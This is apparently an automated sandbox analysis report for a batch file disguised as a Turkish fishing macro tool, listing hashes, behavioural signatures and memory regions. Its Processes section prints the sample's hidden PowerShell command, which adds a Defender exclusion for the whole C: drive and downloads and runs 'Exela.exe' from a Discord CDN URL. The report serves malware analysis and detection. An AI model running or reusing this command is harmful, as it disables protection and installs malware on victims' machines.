Analysis
-
max time kernel
17s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-03-2024 11:21
Static task
static1
Behavioral task
behavioral1
Sample
sekmeme olta/makro olta makro/koid.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
sekmeme olta/makro olta makro/koid.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
sekmeme olta/sekmemeotoayar.bat
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
sekmeme olta/sekmemeotoayar.bat
Resource
win10v2004-20240226-en
General
-
Target
sekmeme olta/sekmemeotoayar.bat
-
Size
12KB
-
MD5
b585b6ebb583d11eebb2ff5392d27724
-
SHA1
98e215b33ee123d0f3e1d9ca88af3d6ea2c89a3c
-
SHA256
a3a60d095e054a2fb6b951cb499df5bae45d6c4361cd9c3a338a61690e388ea1
-
SHA512
ce07e1daeec628ef391c0b11d6240e9606c8440d3cf09217b81788e7d0de5ecdbd66653a57276d6c3731523c6a64ac921b5e870386b571828d201f86481496c3
-
SSDEEP
384:1bvuYOOQ1CvlyejVghBYjiVKRq5aixzorf9BLEHQ:1bXf8oKK80ixuUHQ
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1167569425721995295/1167776678743908422/Exela.exe
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2860 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2804 wrote to memory of 2632 2804 cmd.exe fsutil.exe PID 2804 wrote to memory of 2632 2804 cmd.exe fsutil.exe PID 2804 wrote to memory of 2632 2804 cmd.exe fsutil.exe PID 2804 wrote to memory of 2860 2804 cmd.exe powershell.exe PID 2804 wrote to memory of 2860 2804 cmd.exe powershell.exe PID 2804 wrote to memory of 2860 2804 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\sekmeme olta\sekmemeotoayar.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\fsutil.exefsutil dirty query C:2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c Add-MpPreference -ExclusionPath "C:";Start-BitsTransfer -Source "https://cdn.discordapp.com/attachments/1167569425721995295/1167776678743908422/Exela.exe" -Destination "C:\srchost.bat";Invoke-expression "C:\srchost.bat"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2860-4-0x000000001B3D0000-0x000000001B6B2000-memory.dmpFilesize
2.9MB
-
memory/2860-5-0x0000000002360000-0x0000000002368000-memory.dmpFilesize
32KB
-
memory/2860-6-0x000007FEF57A0000-0x000007FEF613D000-memory.dmpFilesize
9.6MB
-
memory/2860-7-0x00000000026D0000-0x0000000002750000-memory.dmpFilesize
512KB
-
memory/2860-8-0x00000000026D0000-0x0000000002750000-memory.dmpFilesize
512KB
-
memory/2860-9-0x000007FEF57A0000-0x000007FEF613D000-memory.dmpFilesize
9.6MB
-
memory/2860-10-0x00000000026D0000-0x0000000002750000-memory.dmpFilesize
512KB
-
memory/2860-11-0x000007FEF57A0000-0x000007FEF613D000-memory.dmpFilesize
9.6MB